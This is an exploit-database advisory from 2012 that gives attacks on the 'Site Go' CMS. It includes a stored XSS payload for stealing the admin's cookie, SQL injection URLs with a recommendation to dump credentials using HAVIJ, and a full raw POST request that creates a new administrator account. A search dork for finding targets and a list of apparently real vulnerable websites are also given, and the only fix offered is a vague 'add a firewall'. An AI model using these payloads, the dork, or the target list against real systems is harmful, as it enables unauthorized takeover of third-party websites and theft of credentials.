Site Go - multiple Vulnerabilities



EKU-ID: 1796 CVE: OSVDB-ID:
Author: L3b-r1'z Published: 2012-03-30 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##############################################
# Exploit Title: Site Go - multiple Vulnerabilities           #
# D0rk: allintitle: "بوابة التدوين"                                       #
# Date: 12.mar.29                                                     #
# Author: L3b-r1'z                                                      #
# Email Me : L3br1z@gmail.com \ L3b-r1z@live.com   #
# Security : Low                                                        #
##############################################


Xss Vuln :

in search b0x , you can put ( <script>alert("Sec3ever")</script> ) And you will se the alert .
ok but this doesn't mean anything ;) , when the owner site open admin panel , he will se the alert ( you can hijacking the coockie )
Why ???
cz everything you write in search bar , Will Registered in Admin Panel ;)

Snap :

http://www10.0zz0.com/2012/03/29/13/713572158.png - pic num 1
http://www10.0zz0.com/2012/03/29/13/570372481.png - pic num 2

|0-0-0-0-0-0-0-0-0-0-0-0-0-0-0|

Sql I Vuln :

Is Too Simple , You Can Get The User and Pass From HAVIJ ;)

http://www.domain.tld/?gallery=class&class=5'
http://www.domain.tld/?gallery=class&class=5''a
http://www.domain.tld/?gallery=class&class=Sql Here

Snap :

http://www10.0zz0.com/2012/03/29/13/229680938.png

Example Site :

http://www.un-web.com/?gallery=class&class=5'
http://asdaa-lb.com/?gallery=ShowImg&Img=1'
http://el3sha.com/?gallery=ShowImg&Img=1'
http://muhageren.com/?articles=topic&topic=5'

|0-0-0-0-0-0-0-0-0-0-0-0-0-0-0|

Add Admin Vuln :

you can add admin from POST ( any tool like HACKBAR )
{
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/site-go/admin/?action=moderators&idm=add
Cookie: style_name=green; article_1=ok; __utma=111872281.668472016.1332650059.1332650059.1332650059.1; __utmz=111872281.1332650059.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=f7d80bbbc41018861f1056662d708699; phpwcmsBELang=en; CookieName=8a110d3sdf6e4558e3434616b750b11f
Content-Type: application/x-www-form-urlencoded
Content-Length: 237

(user=123456&pass=123456&email=L3br1z%40gmail.com&articles_mo=articles_mo&gallery_mo=gallery_mo&songs_mo=songs_mo&video_mo=video_mo&programs_mo=programs_mo&links_mo=links_mo&multi_mo=multi_mo&root_mo=root_mo&B1=%CA%E4%DD%ED%D0&sub_add=yes)

}

Snap :

http://www10.0zz0.com/2012/03/29/13/249898101.png - pic num 1

http://www10.0zz0.com/2012/03/29/13/605608097.png - pic num 2

|0-0-0-0-0-0-0-0-0-0-0-0-0-0-0|

How To Fix :

Add FireWall To Your Admin Panel

|0-0-0-0-0-0-0-0-0-0-0-0-0-0-0|

###################################################################################################
# Greet'z : B0x , Mad Hacker , Mr.Black , Unknown Hacker , Ked-Ans , I-Hmx , Sec4ever , TheInjector , Hacker-1420 .#
# SerialB0y , Rock!n , R0073r , And All Inj3ct0r Members , And All My Friends ;)                                                       #
###################################################################################################